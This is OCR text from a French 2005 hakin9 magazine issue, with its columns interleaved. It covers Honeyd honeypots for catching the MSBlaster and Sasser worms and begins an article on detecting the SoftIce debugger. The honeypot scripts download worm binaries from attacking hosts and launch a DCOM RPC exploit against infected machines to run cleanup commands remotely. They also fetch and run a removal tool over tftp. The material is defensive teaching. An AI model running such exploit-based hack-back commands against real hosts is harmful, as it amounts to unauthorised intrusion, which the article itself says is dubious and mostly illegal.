15: set windows default icmp action block
16: add windows tcp port 80 §
"perl /usr/local/share/honeyd/scripts/iis/main.pl"
17: add windows tcp port 25 block
18: add windows tcp port 23 proxy $ipsrc:23
19: set windows uptime 1638112
20:
21: bind 10.0.0.10 linux
22: bind 10.0.0.11 freebsd
23: bind 10.0.0.12 windows
www.hakin9.org hakin9 N o 3/2005
 Honeypots – leurre contre les vers

est choisi de façon aléatoire parmi

Listing 3. Le script test.sh enregistrant les actions sur le port 22 du 0 – 20 jours.
honeypot Quand le fichier de configuration
#!/bin/sh
et tous les scripts sont déjà prêts,
DATE=`date` nous lançons le programme Honeyd
echo "$DATE: Connection started from $1 port $2" \ de la manière suivante :
>> /usr/local/share/honeyd/logs/test.log
echo SSH-1.5-2.40
# honeyd -d -u 0 -g 0 \
while read line
-f config1 10.0.0.10-10.0.0.12
do
echo "User input: $line" >> /usr/local/share/honeyd/logs/test.log
echo "$line" Grâce au paramètre -d , le pro-
done gramme ne passe pas en mode
tâche de fond et tous les journaux
Les lignes 10, 11 et 16 com- 23 de l'ordinateur d'où ils provien- sont affi chés sur la sortie standard.
prennent la confi guration des ser- nent. En résultat, l'intrus tentera Ainsi, dans la phase de tests nous
vices liés aux ports 22 et 80 des d'établir une connexion avec son pouvons observer ce qui se passe,
systèmes spécifi ques. Dans le cas propre système. quelles connexions sont établies
du profil freebsd , après l'établisse- Une autre fonction du program- avec nos machines virtuelles et s'il
ment de la connexion à ces ports, me Honeyd très utile, exploitée n'y a pas d'erreurs éventuelles. Évi-
le programme Honeyd transmet la dans cet exemple, est la possibilité demment, quand le programme est
communication aux scripts du shell de confi gurer la valeur du temps déjà testé, il vaut mieux le lancer en
apache-web.sh (port 80) et test.sh utilisable (uptime) du système mode de tâche de fond avec les pa-
(port 22) qui seront responsables virtuel, c'est-à-dire le temps de ramètres -l et -s (ils répondent de
de la reception, de l'enregistrement fonctionnement depuis le dernier l'enregistrement des évènements)
et de l'interprétation des données lancement. La ligne 19 confi gure le pour diriger les journaux aux fi -
provenant de l'intrus et de l'envoi temps du travail du profilé windows chiers appropriés (p. ex. dans le
des données vers celui-ci. Le script à 1638112 secondes, ce qui donne répertoire /usr/local/share/honeyd/
test.sh, présenté à titre d'exemple environ 18 jours. Si le profil ne con- logs/ ). Dans la phase de tests,
dans le Listing 3, émule d'une fa- tient pas de d'inscription avec le nous pouvons aussi lancer Honeyd
çon très simple le serveur SSH et temps de fonctionnement, celui-ci avec les droits d'administrateur (les
enregistre dans le fi chier /usr/local/
share/honeyd/logs/test.log toutes
les informations reçues. Le script
apache-web.sh est beaucoup plus
développé et émule le serveur
HTTP Apache. Par contre, dans le
cas du profil windows, le port TCP 80
sera géré par le script Perl appelé
main.pl qui se comporte comme un
serveur IIS 5.0. Tous les scripts (et
plusieurs autres) sont disponibles
sur le site du programme Honeyd.
Une fonction très intéressante
offerte par Honeyd est la possibilité
de rediriger les connexions. Elle a
été appliquée aux lignes 5 et 18
dans le fichier confi g1. La première
permet de transférer les paquets
envoyés sur le port TCP 80 de l'or-
dinateur ayant le profilé linux vers
le système qui se trouve à l'adresse
www.google.com – en résultat, l'in-
trus se connectera au moteur de
recherche. Par contre, grâce à la
ligne 18, les paquets adressés au
port TCP 23 de la machine virtuelle
windows seront envoyés sur le port Figure 4. La localisation du honeypot dans un réseau

hakin9 N o 3/2005 www.hakin9.org 53

 paramètres -u et -g) – cela permet-
Listing 4. Le contenu du fichier config2 tra d'éviter les problèmes relatifs
1: create default
aux droits d'accès aux scripts
2: set default personality "Microsoft Windows 2000 Professional" et répertoires utilisés.
3: add default tcp port 135 open Maintenant, il faut faire en sorte
4: add default tcp port 445 open que notre honeypot réponde par
5: set default default tcp action reset
son adresse matérielle aux requêtes
6: set default default udp action reset
ARP, adressées aux ordinateurs
portant les IPs 10.0.0.10, 10.0.0.11
et 10.0.0.12. Pour cela, nous pou-
Listing 5. Le contenu du fichier config3 vons nous servir du programme
arpd, écrit par l'auteur de Honeyd
1: create default et disponible sur son site. Dans notre
2: set default personality "Microsoft Windows 2000 Professional"
exemple, nous lançons arpd avec les
3: add default tcp port 135 open
4: add default tcp port 445 open
paramètres suivants :
5: add default tcp port 4444 §
"/bin/sh scripts/MSBlaster_Catcher.sh $ipsrc $ipdst" # arpd 10.0.0.10-10.0.0.12
6: add default tcp port 9996 §
"/bin/sh scripts/Sasser_Catcher.sh $ipsrc $ipdst"
Finalement, nous devons tester
7: set default default tcp action reset
8: set default default udp action reset
le honeypot, c'est-à-dire scanner
et établir quelques connexions avec
nos nouveaux systèmes virtuels.
Peu importe si nous le faisons à par-
Listing 6. Le script MSBlaster_Catcher.sh tir d'un ordinateur derrière le routeur
ou à l'intérieur de notre réseau.
#!/bin/sh L'exemple présenté n'exploite
que quelques possibilités principales
DATE=`date +%s`
mkdir /worms/MSBlaster/$1-$2-$DATE
offertes par Honeyd qui, en fait, est
cd /worms/MSBlaster/$1-$2-$DATE beaucoup plus complexe. Il permet
d'émuler des réseaux entiers (jus-
tftp $1 <<EOF qu'à 65 000 de stations !) utilisant
get msblast.exe
des routeurs virtuels et de créer des
quit
EOF
systèmes dynamiques modifiant la
configuration en fonction du fait qui
et quand s'y connecte. Pourtant,
Listing 7. Le script Sasser_Catcher.sh pour lutter contre les vers de réseau
et les virus, ces fonctions de base
#!/bin/sh sont suffisantes.
DATE=`date +%s`
mkdir /worms/Sasser/$1-$2-$DATE
Vers dans le miel
cd /worms/Sasser/$1-$2-$DATE Si nous voulons que notre honeypot
fonctionne correctement, il ne faut
while read LINE pas oublier de le placer dans le lieu
do
approprié du réseau et de définir les
LINE=`echo "$LINE" | grep "get"`
méthodes d'accès. Prenons comme
if [ "$LINE" ] exemple le réseau présenté sur la
then Figure 4. Bien sûr, le meilleur envi-
FILENAME=`echo "$LINE" | cut -f3 -d" " | cut -f1 -d">"` ronnement pour capturer les vers in-
Défense

formatiques est un segment séparé

ncftp -u anonymous -p user -P 5554 $1 <<EOF
bin
du réseau, mais pour les besoins de
get $FILENAME cet article, nous nous servirons d'un
bye réseau entier.
EOF C'est une configuration très sim-
ple et très souvent utilisée. Elle se
break
fi
compose de deux sous-réseaux :
done la zone démilitarisée qui embrasse
les serveurs de courrier et de Web

54 www.hakin9.org hakin9 N o 3/2005

 Honeypots – leurre contre les vers

et le réseau interne contenant les

Installation et configuration du serveur SSH dans le stations de travail utilisées par les
employés de l'entreprise. Les deux
système Windows réseaux sont connectés à Internet
L'installation du serveur OpenSSH dans les systèmes Windows 2000 et XP est assez
à l'aide d'un routeur, par contre les
facile. Pour ce faire, il faut effectuer les actions suivantes :
stations de travail sont protégées
• Ouvrez une session locale à partir du compte Administrator et lancez le programme par un pare-feu. Pour faciliter notre
d'installation. tâche, admettons que l'entreprise ait
• Acceptez les termes de la licence, sélectionnez les composants que vous voulez obtenu la classe C des adresses IP
utiliser (dans notre cas Shared Tools et Server sont suffisants) et le répertoire cible – de 62.x.x.0 à 62.x.x.254.
(vous pouvez laisser celui par défaut C:\Program Files\OpenSSH). Comme vous pouvez voir sur
• Lancez le shell et accédez au répertoire C:\Program Files\OpenSSH\bin.
la Figure 4, le honeypot a été ins-
• Créez le fichier de droits pour les groupes d'utilisateurs dans etc\group à l'aide de
tallé sur le sous-réseau extérieur
la commande mkgroup -l >> ..\etc\group (pour les groupes locaux) et, éven-
et a obtenu l'adresse 62.x.x.11. Les
tuellement mkgroup -d >> ..\etc\group (pour les groupes de domaine).
• Ajoutez au fichier etc\passwd les utilisateurs qui pourront ouvrir les sessions dans adresses de 62.x.x.1 à 62.x.x.11 sont
le système via le serveur SSH. La syntaxe de la commande appropriée est la affectées aux machines réelles, par
suivante : mkpasswd -l|-d [-u <username>]. Quant à nous, nous voulons ajouter contre les autres sont utilisées par le
l'utilisateur local Administrator, tapons donc la commande mkpasswd -l -u Admi- programme Honeyd. Grâce à cela, le
nistrator >> ..\etc\passwd. réseau contient jusqu'à 243 machi-
• Lancez le serveur à l'aide de la commande net start opensshd et en vous con- nes virtuelles qui servent de leurre
nectant à celui-ci à partir d'un autre ordinateur du réseau (le mieux, à partir de aux vers – cela permet d'augmenter
votre honeypot), vérifiez s'il fonctionne correctement. d'une façon importante la probabi-
• Configurez le serveur de façon à ce qu'il authentifie l'utilisateur Administrator au
lité que le ver s'attaquera au piège
moyen des clés cryptographiques, et pas à l'aide du mot de passe.
et pas à un serveur de service ou
• Lancez le shell et accédez au répertoire C:\Program Files\OpenSSH\bin,
à une station de travail.
• Générez une paire de clés cryptographiques par le biais de la commande ssh-
keygen -t dsa. Quand il vous est demandé d'entrer son emplacement, laissez
Pour que le honeypot puisse
le chemin par défaut /home/Administrator/.ssh/id_dsa. Le champ du mot de nous protéger efficacement contre
passe doit rester vide. En résultat, dans le répertoire C:\Documents and Settings\ les vers de réseau, il faut, lors de sa
Administrator\.ssh, les fichiers id_dsa (clé privée) et id_dsa.pub (clé publique) sont configuration et installation prendre
créés. en compte toutes les étapes de son
• Ajoutez la clé publique au fichier avec les clés confirmées : tout en étant dans le fonctionnement. Commençons par
répertoire C:\Documents and Settings\Administrator\.ssh exécutez la commande obtenir le code d'un ver.
copy /b id _ dsa.pub authorized _ keys.
• Transférez le fichier avec la clé privée du serveur au honeypot et mettez-la dans
Phase d'infection
le répertoire .ssh de l'utilisateur, avec les droits d'accès avec lesquels vous lancez
En phase d'infection, nous devons
le programme Honeyd. Dans notre cas, c'est l'utilisateur root et le répertoire /root/
tromper le ver de façon à ce qu'il
.ssh. Il faut encore affecter au fichier les droits appropriés : chmod 400 id _ dsa.
• Vérifiez la configuration en vous connectant au serveur : ssh -l Administrator croit qu'il a à faire à un système vul-
server. nérable et lui permettre d'effectuer
• En cas de problèmes ou s'il vous est encore demandé d'entrer le mot de passe, l'attaque. Grâce à cela, nous per-
il faut vérifier la configuration du serveur SSH (le fichier C:\Program Files\ mettons au programme malicieux
OpenSSH\etc\sshd_config) et, en cas de besoin, affecter les valeurs suivantes de passer à la phase suivante,
aux paramètres mentionnés : StrictModes no, PubkeyAuthentication yes, c'est-à-dire au processus de pro-
AuthorizedKeysFile .ssh/authorized _ keys. Si les problèmes persistent, vous pagation, et en même temps, nous
devez vous référer à la documentation fournie avec le programme. détecterons l'attaque et la source
de provenance. Vu que nous nous
intéressons aux vers MSBlaster
Listing 8. Le fichier de configuration config4 et Sasser, nous devons donc ému-
ler les systèmes Windows 2000 ou
1: create default
XP qui donnent accès aux servi-
2: set default personality "Microsoft Windows 2000 Professional"
3: add default tcp port 135 open ces vulnérables. Pour cela, nous
4: add default tcp port 445 open pouvons exploiter la confi guration
5: add default tcp port 4444 § présentée dans le Listing 4.
"/bin/sh scripts/MSBlaster_Cleaner.sh $ipsrc $ipdst" En résultat, le programme Ho-
6: add default tcp port 9996 §
neyd créera un profil de l'ordinateur
"/bin/sh scripts/Sasser_Cleaner.sh $ipsrc $ipdst"
7: set default default tcp action reset virtuel ayant les caractéristiques du
8: set default default udp action reset système d'exploitation Microsoft Win-
dows 2000 Professional, qui attendra

hakin9 N o 3/2005 www.hakin9.org 55


Listing 9. Le script MSBlaster_Cleaner.sh
#!/bin/sh
./dcom_exploit -d $1 -t 1 -l 4445 << EOF
taskkill /f /im msblast.exe /t
del /f %SystemRoot%\System32\msblast.exe
echo “Windows Registry Editor Version 5.00" > c: \cleaner.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] \
>> c:\cleaner.reg
echo "windows auto update" = "REM msblast.exe" >> c: \cleaner.reg
regedit /s c:\cleaner.reg
del /f c:\cleaner.reg
shutdown -r -f -t 0
exit
EOF
date=`date`
echo "$date: L'ordinateur $1 a été nettoyé du ver MSBlaster" \
>> /worms/cleanup
les connexions TCP sur les ports
destinés aux services DCOM RPC
et LSASS. Le profil porte le nom de-
fault. C'est un nom spécial, imposant
l'utilisation de ce profil pour toutes les
adresses IP auxquelles aucun autre
profil n'a été affecté. Dans ce cas, ce
sera toute la plage d'adresses gérées
par Honeyd. Les programmes Honeyd
et arpd sont démarrés à l'aide des
commandes suivantes :
# honeyd -d -u 0 -g 0 \
-f config2 62.x.x.12-62.x.x.254
# arpd -d 62.x.x.12-62.x.x.254
Phase de propagation
Pour que le ver passe à l'étape de
propagation, il faut simuler la conta-
mination réussie. Dans le cas de MS-
Blaster et Sasser c'est très simple
et cela consiste à permettre aux vers
d'établir une connexion aux shell liés
aux ports TCP 4444 et 9996 sur
l'ordinateur attaqué. Il faut donc dé-
Défense
velopper le ficher de configuration du
programme Honeyd du Listing 4 de
façon présentée dans le Listing 5.
Deux nouvelles lignes, portant
les numéros 5 et 6, ont été créées.
Dans les systèmes virtuels, elles
lient aux 4444 et 9996 les scripts
appelés MSBlaster_Catcher.sh et
Sasser_Catcher.sh. Ces scripts
56
sont démarrés avec deux paramè-
tres $ipsrc et $ipdst qui signifient
les adresses IP respectivement de
l'ordinateur de l'attaquant et de la
victime, transférées aux scripts par
le programme Honeyd. La tâche de
ces scripts consiste à simuler le pro-
cessus de propagation et à charger
à partir de l'ordinateur de l'intrus le
code du ver. Leur contenu est pré-
senté dans les Listings 6 et 7.
Le script MSBlaster_Catcher.sh
crée (la ligne 4) dans le répertoire
/worms/MSBlaster un sous-réper-
toire portant le nom composé des
adresses IP de l'ordinateur atta-
quant et de l'ordinateur-victime
Listing 10. Le script Sasser_Cleaner.sh
#!/bin/sh
ssh -l Administrator $1 << EOF
tftp -i 62.x.x.11 get f-sasser.exe C:\f-sasser.exe
C:\f-sasser.exe
attrib -R C:\f-sasser.exe
del C:\f-sasser.exe
exit
EOF
date=`date`
echo "$date: L'ordinateur $1 a été nettoyé du ver Sasser" \
>> /worms/cleanup
www.hakin9.org
(qu'il obtient à partir du programme
Honeyd sous forme d'arguments de
la ligne de commandes) et de la date
actuelle présentée au format défi-
nissant le nombre de secondes qui
se sont écoulées depuis le 1 janvier
1970. Ensuite, il passe à ce réper-
toire (ligne 5) et par l'intermédiaire
du client du service TFTP se con-
necte à l'intrus (ligne 7). Les lignes
8 et 9 contiennent les commandes
transférées au programme tftp. Les
deux premières sont chargées par
le fichier msblast.exe, par contre les
deux dernières terminent la session.
Le script Sasser_Catcher.sh
fonctionne de la même façon, mais
vu la spécificité du ver Sasser, c’est
plus compliqué. Le nom du fichier du
programme envoyé se compose de
deux parties et se présente ainsi :
<numéro>_up.exe, où le champ
<numéro> est une valeur numéri-
que aléatoire. Alors, pour charger le
fichier du programme à partir du sys-
tème de l'intrus (les lignes 15 à 19),
le script doit d'abord connaître son
nom complet en lisant et analysant
les commandes données par Sasser
(les lignes 7 à 13).
Comme il est facile à remarquer,
les scripts ci-dessus ont été créés
à partir des informations sur la pro-
pagation des vers (cf. le Listing 1). Le
programme Honeyd les exécutera au
moment où les connexions aux ports
4444 ou 9996 seront établies. À la
suite de leur actions – dans le cas
où la connexion est établie par le ver
MSBlaster ou Sasser – on obtient les
hakin9 N o 3/2005
 Honeypots – leurre contre les vers

fichiers binaires contenant leur code qui travaille par défaut sur ce port, commandes dans le système à partir
exécutable. Ces fichiers peuvent être et ensuite, cette adresse IP essaie duquel l'attaque est effectuée ou
analysés et exploités dans la créa- de se connecter à un port élevé pas à télécharger et lancer le programme
tion des vaccins pour les program- standard, cela peut signaler une ten- anti-virus. Dans le cas des ordina-
mes anti-virus et les modèles pour tative de connexion au shell lancé teurs que nous administrons (nous
les systèmes IDS. Ils peuvent être par un exploit. Il faudra donc lier avons les droits d'administration),
aussi lancés dans un environnement à ce port non standard un script d'en- il est préférable d'utiliser pour cela
séparé, sous contrôle, pour mieux registrement et analyser les données des programmes pour le travail dis-
connaître leur fonctionnement. qui y seront envoyées. C'est de cela tant – ici, c'est l'application SSH.
dont dépendent toutes nos démar- Paradoxalement, nous pouvons
Parasites inconnus ches futures. aussi effectuer le nettoyage auto-
Nous savons déjà capturer les vers matique dans les systèmes dans
connus – nous savons comment ils Réponse à l'attaque lesquels nous n'avons pas les droits
se propagent et quelles vulnérabilités Dans certaines situations, par exem- d'administration : en exploitant la
ils exploitent. Mais que faire en cas de ple lorsque nous administrons un même vulnérabilité grâce à laquelle
nouveaux vers, pas encore connus ? grand réseau composé de plusieurs le ver a accédé à l'ordinateur. Bien
Est-il possible de les capturer à l'aide stations de travail tournant sous le sûr, ce n'est pas toujours facile parce
des honeypots d'une façon similaire contrôle des systèmes Windows qu'il faut posséder le programme ap-
à celle présentée ci-dessus ? 2000/XP, il est préférable de cons- proprié (exploit) qui permettra d'utili-
Oui, c'est possible. Mais c'est truire un honeypot qui, après la dé- ser la faille. D'habitude, cela ne pose
beaucoup plus fastidieux parce qu'il tection d'un programme malicieux, pas de problèmes – très souvent la
faut prendre connaissance du mode pourra le supprimer automatique- description de l'erreur est généra-
de fonctionnement du ver donné ment. Évidemment, les mises à jour lement connue. Même si nous ne
(ce qui implique la nécessité de régulières des bases de données sommes pas capables de concevoir
surveiller constamment les événe- de nos programmes anti-virus et le l'exploit nous-mêmes, il est probable
ments qui ont lieu sur le honeypot). respect des règles de cyberhygiène qu'il sera accessible sur un site ou
Tout d'abord, nous devons préparer sont aujourd'hui la meilleure façon de une groupe de discussion consacrés
les pièges appropriés qui simuleront se protéger contre les vers et virus. à la sécurité informatique. Néan-
le fonctionnement du plus grand Mais peut-être les vers qui seront moins, il faut rester prudent parce
nombre d'applications et enregistre- créés dans le futur seront si avancés que ces types d'actions ne sont rien
ront toutes les données qui lui sont que l'élaboration de leur modèle uni- d'autre que une intrusion non autori-
envoyées. Pour cela, nous pouvons versel sera très difficile et fastidieux, sée dans un ordinateur. En dépit de
nous servir d'un script similaire à ce- voire impossible. Même aujourd'hui, notre bonne volonté, ces démarches
lui présenté dans le Listing 3. depuis l'apparition du parasite jus- sont moralement douteuses, et dans
Une fois le honeypot construit qu'à la création du vaccin approprié, la plupart des cas, illégales.
et démarré, il faut surveiller régu- cela prend encore du temps. Nous allons montrer en pratique
lièrement les informations collec- En cas d’attaque par MSBlaster, les deux méthodes. Le honeypot
tées pour pouvoir réagir de façon Sasser et plusieurs autres vers, reconfiguré supprimera le ver MS-
appropriée. Par exemple, si nous il est assez facile de construire un Blaster en accédant à l'ordinateur
remarquons que l'un des ports TCP honeypot qui sera capable de les infecté via la faille dans le service
reçoit des chaînes de caractères res- supprimer automatiquement. Cela DCOM RPC, par contre les systè-
semblant à une tentative de débor- est dû au fait que la suppression du mes contaminés par Sasser seront
dement du tampon dans l'application ver est réduite à exécuter quelques nettoyés à l'aide du programme Sas-
ser Removal Tool, créé par la société
F-Secure.
Sur le réseau : Au-début, nous devons élargir la
configuration de notre réseau de la
• http://www.honeyd.org – le site du programme Honeyd,
Figure 4. Les serveurs et les stations
• http://sshwindows.sourceforge.net – le site du port de l'application OpenSSH pour
de travail seront dotés du service
les systèmes Windows,
• http://freessh.org – la liste des serveurs et clients SSH pour différents systèmes SSH qui authentifie les utilisateurs
d'exploitation, à l'aide de clés cryptographiques (ce
• http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c – l'ex- processus est présenté dans l'En-
ploit utilisant la vulnérabilité dans RPC DCOM, cadré Installation et configuration
• http://www.f-secure.com/v-descs/sasser.shtml – Sasser Removal Tool, du serveur SSH dans le système
• http://www.sysinternals.com/ntw2k/freeware/pstools.shtml – le kit d'outils gratuits Windows). De plus, nous lançons
pour les systèmes Windows NT et 2000. sur le honeypot le service TFTP qui
permet de télécharger le programme

hakin9 N o 3/2005 www.hakin9.org 57

 Sasser Removal Tool sous forme
du fichier f-sasser.exe. Il faut aussi
modifier le fichier de configuration
du programme Honeyd de la façon
présentée dans le Listing 8.
Comme vous voyez, les scripts
responsables de l'interception du
code des vers ont été remplacés
respectivement par les scripts
MSBlaster_Cleaner.sh et Sasser_
Cleaner.sh. Alors, si l'un des ordi-
nateurs-leurres virtuels est attaqué
par le ver, les opérations contenues
dans ces scripts seront exécutées.
Le premier script, présenté dans le
Listing 9, se sert de l'exploit utilisant
la vulnérabilité du service DCOM
RPC et permettant d'exécuter les
commandes quelconques dans le
système attaqué. Contrairement
à MSBlaster, ces commandes n'ont
pas de caractère destructif, mais ont
pour but d'éliminer le ver.
Sous cette forme, vu que le
script utilise les commandes taskkill
et shutdown (qui ne sont pas disponi-
bles dans Windows 2000), il permet
seulement d'éliminer les vers des
systèmes Windows XP. Pourtant,
il n'est pas trop difficile de modifier le
script de façon à ce qu'il utilise des
commandes similaires disponibles
dans le kit Windows 2000 Resource
Kit ou PsTools.
À la ligne 3 du script MSBlas-
ter_Cleaner.sh, un exploit est lancé.
Cet exploit, conformément au para-
mètre -d $1, attaque l'ordinateur ayant
l'adresse IP transférée du programme
Honeyd par l'intermédiaire de la varia-
ble $ipsrc et affichée dans le script
comme variable $1. Le paramètre -t
1 détermine que le système d'exploi-
tation installé sur l'ordinateur est Win-
dows XP, par contre -l 4445 dit que
le shell attendant la commande de la
part de l'intrus sera lancée sur le port
TCP portant le numéro 4445.
Défense
Toutes les commandes exé-
cutées sur la machine attaquée
(et dans ce cas nettoyée) se trouvent
entre les lignes 4 à 17. Conformé-
ment à ces inscriptions, en premier
lieu, le processus du ver MSBlaster
(ligne 5) est terminé et son fichier
exécutable supprimé (ligne 7). En-
suite (les lignes 9 à 11), le script
58
préparera le fichier cleaner.reg con-
tenant les commandes pour l'Éditeur
du registre du système Windows, qui
supprimera du registre les inscrip-
tions lançant le ver pendant le dé-
marrage de l'ordinateur. Aux lignes
12 et 13, ce fichier sera supprimé.
Les lignes 14 à 16 peuvent contenir
les commandes supplémentaires
– par exemple celles informant l'utili-
sateur sur la détection et l'élimination
du ver ou, comme dans la ligne 15,
redémarrant le système. Grâce aux
commandes comprises entre les
lignes 20 et 21, après chaque sup-
pression du ver, le script ajoutera
au fichier /worms/cleanup une ins-
cription avec la date d'opération et
l'adresse IP de l'ordinateur nettoyé.
Le script supprimant le ver Sas-
ser, présenté dans le Listing 10,
fonctionne d'une façon un peu dif-
férente : pour se connecter au shell
du système Windows et exécuter
les opérations qui éliminent Sasser,
il utilise le programme SSH. Le
nettoyage du système est réalisé
à l'aide du programme f-sasser.exe
chargé à partir du honeypot.
Le script Sasser_Cleaner.sh se
connecte à l'ordinateur infecté con-
formément à la commande contenue
dans la ligne 3, et ensuite, exécute
les commandes des lignes 5 jusqu'à
9. À la fin, il enregistre dans le fichier
/worms/cleanup la date d'événement
et l'adresse de l'ordinateur nettoyé.
Est-ce sûr ?
Bien que la méthode d'élimination
des vers de réseau présentée soit
très efficace, il faut la considérer plu-
tôt comme curiosité et l'utiliser avec
prudence. Il ne faut pas oublier les
trois principes essentiels.
Premièrement, il faut rendre im-
possible le nettoyage des ordinateurs
qui ne sont pas sous notre protection.
Pour ce faire, nous pouvons limiter la
sortie via honeypot de notre réseau
à l'aide d'un pare-feu ou modifier les
scripts du programme Honeyd de fa-
çon à ce qu'il entreprenne les actions
uniquement envers les ordinateurs de
la liste que nous avons créée.
Deuxièmement, la configura-
tion du service SSH telle que nous
www.hakin9.org
l’avons présentée est assez dan-
gereuse et permettra à l'intrus qui
s'introduira dans le système-piège
d'accéder à tous les ordinateurs de
notre réseau.
La dernière chose, la plus im-
portante : pour que le honeypot
fasse bien sa tâche et protège effi-
cacement le système informatique,
il doit être correctement construit, ins-
tallé dans l'endroit approprié et tenu
à jour. Si non, il sera inutile et pour-
rait être dangereux. En même temps,
il ne faut pas oublier que le système
honeypot n'est qu'une partie de l'ar-
chitecture de la sécurité informatique
qui, en tant que telle, est composée
de plusieurs éléments. Il n'est pas
capable non plus de remplacer les
moyens de sécurité tels que pare-
feux, systèmes IDS ou de bonnes
habitudes. n
Projet Honeynet
Le projet Honeynet (http://honeynet.
org) est l’une des applications pra-
tiques les plus intéressantes des
honeypots. Ses membres utilisent –
à des fins d’études – les réseaux en-
tiers des honeypots à une très haute
interaction. Honeynet est une organisa-
tion non-profit dont la tâche principale
est de mener les recherches sur la sé-
curité des réseaux informatiques. Les
objectifs qu’elle veut réaliser sont l’aug-
mentation de la conscience des utilisa-
teurs d’Internet (en présentant les cas
d’intrusions dans les systèmes réels),
l’éducation (conférences, formations)
et les études scientifiques (fournir les
méthodes permettant de collecter les
informations). Actuellement, le projet
utilise les réseaux des honeypots de
la deuxième génération, capables de
collecter automatiquement et d’analy-
ser les données.
Les membres de Honeynet Project
publient leur propre distribution Linux
bootable (Honeywall). Celle-ci permet
la configuration rapide et facile des
réseaux des honeypots composés
ainsi que l’enregistrement détaillé des
événements produits dans ces systè-
mes. Le disque comprend également
tous les outils nécessaires pour mener
les études portant sur la sécurité des
systèmes informatiques aussi bien
réels que virtuels.
hakin9 N o 3/2005
 Protéger les logiciels
Windows contre les pirates
informatiques
Jakub Nowak
L
es auteurs des logiciels commerciaux
ne sont pas capables ou ne voient pas
la nécessité de sécuriser leurs œuvres
contre le craquage. Bien sûr, les systèmes de
sécurisation idéaux ne permettant pas aux pi-
rates de créer un patch ou un générateur de
clés n'existent pas. Si cependant vous tentez
de le rendre le plus compliqué possible, il se
peut que le pirate renonce à votre logiciel
et qu'il en choisisse un autre insuffisamment
protégé. Examinons donc de près les tech-
niques grâce auxquelles votre application ne
sera pas une victime facile.
Détecter SoftIce
Le pirate informatique ne peut pas se passer
du débogueur. C'est grâce à lui qu'il peut suivre
instruction par instruction le code du logiciel
Défense
dans l'assembleur. Il existe plusieurs logiciels
remplissant cette fonctionnalité mais dans le
milieu des pirates, c'est SoftIce de la société
NuMega qui est le numéro 1. C'est un débo-
gueur tournant dans l'environnement privilégié
(ring 0).
Pour sécuriser votre code contre un éven-
tuel déboguage, vous pouvez employer quel-
ques trucs permettant de vérifier si SoftIce est
60 www.hakin9.org
La travail du développeur qui
crée des applications shareware
devient tôt ou tard la proie des
pirates informatiques. Il arrive
souvent qu'un crack ou un
keygen apparaisse sur le net
le jour de la sortie du logiciel.
Il existe cependant les méthodes
efficaces permettant de protéger
le code contre les voleurs.
actuellement installé dans le système et chargé
dans la mémoire. En cas de détection, vous
pouvez décider du comportement de votre logi-
ciel. Toutes les méthodes présentées marchent
sans aucun problème sous Windows 9x mais
dans le cas des autres versions de Windows
(ME/NT/XP/2000), le fonctionnement de cer-
taines d'entre elles peut être moins performant.
Cela est dû aux niveaux de sécurité plus élevés
dans les versions plus récentes de Windows
Cet article explique...
• comment sécuriser votre propre logiciel contre
le craquage,
• comment détecter la présence des débogueurs
SoftIce et OllyDbg,
• comment chiffrer les messages d'écran,
• la méthode d'utilisation de dummy opcodes.
Ce qu'il faut savoir...
• Delphi,
• l'assembleur,
• et savoir utiliser les débogueurs sous Win-
dows.
hakin9 N o 3/2005
 Protection contre les pirates informatiques

l'installation des changements au

Listing 1. Détecter le débogueur en trouvant ses pilotes dans la registre en y ajoutant ses propres
mémoire lignes. Les clés modifiées se trou-
if
vent dans l'arborescence HKEY _ LO-
CreateFileA('\\.\SICE', GENERIC_READ or GENERIC_WRITE, CAL _ MACHINE et ce sont :
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, 0) <> INVALID_HANDLE_VALUE • SOFTWARE\Microsoft\Windows\
then
CurrentVersion\Uninstall\
begin
SoftICE ,
showmessage(‘SoftIce détecté!’);
end; • SOFTWARE\NuMega\SoftICE .

Il suffit donc d'appeler la fonction

Listing 2. Ouvrir les clés SoftIce dans le registre à l'aide de la fonction RegOpenKeyEx (voir le Listing 2)

WinAPI RegOpenKeyEx et d'ouvrir la clé définie dans le

registre – si celle-ci n'existe pas,
if la fonction retournera la valeur ER-
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
ROR _ SUCCESS. Pour la clé SOFTWARE\
'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SoftICE',
NuMega\SoftICE , procédez de la
0,KEY_READ,clé) <> ERROR_SUCCESS
then même manière.
begin Une autre technique rela-
showmessage('SoftIce détecté!'); tivement simple de détection
end;
du débogueur SoftIce consiste
à trouver une ligne dans le fichier
autoexec.bat. Lors de l'installation,
Listing 3. Vérification de la ligne SoftIce dans le fichier autoexec.bat SoftIce y ajoute la ligne définis-
sant le chemin vers winice.exe (C:\
var f: textfile; PROGRA~1\NUMEGA\SOFTIC~1\
s, aide: string;
WINICE.EXE) étant le fichier per-
l: integer;
mettant de charger le débogueur
begin dans la mémoire. Cette méthode a
assignfile(f, 'c:\autoexec.bat'); été présentée sur le Listing 3.
reset(f); Le débogueur peut être égale-
while not eof(f) do
ment détecté grâce à des méthodes
begin
readln(f, s);
plus compliquées. L'une des techni-
for l:=1 to length(s) do ques possibles consiste à employer
s[l]:=Upcase(s[l]); les exceptions. Pour les initialiser
aide:=s; et les utiliser, choisissez les fonctions
if aide ='C:\PROGRA~1\NUMEGA\SOFTIC~1\WINICE.EXE' then
API comme, par exemple, SetUnhan-
begin
dledExceptionFilter ou UnhandledEx-
showmessage(‘SoftIce détecté!’);
end; ceptionFilter.
end; SoftIce intercepte tous les ap-
closefile(f) pels INT 3. Si le registre EBP a la
end;
valeur BCHK et 4 est la valeur du
registre EAX , le débogueur ne per-
met pas d'assigner ExceptionHan-
– certains trucs ne sont tout simple- et sa poignée sera retournée. Dans dler. Au lieu de cela, il retourne la
ment plus valables. le cas contraire, la fonction appelée valeur 0 dans le registre AL . Si le
La première méthode la plus retournera INVALID _ HANDLE _ VALUE , logiciel n'est pas démarré à l'aide
fréquente pour détecter SoftIce ce que veut dire l'absence du pi- de SoftIce, SetUnhandledException-
consiste à détecter ses pilotes – les lote. Pour le pilote ntice.vxd, vous Filter est utilisé pour intercepter les
fi chiers sice.vxd et ntice.vxd. Es- pouvez procéder de la même ma- erreurs et pour continuer à partir de
sayons de les ouvrir en appellant nière. l'adresse indiquée. Si vous utilisez
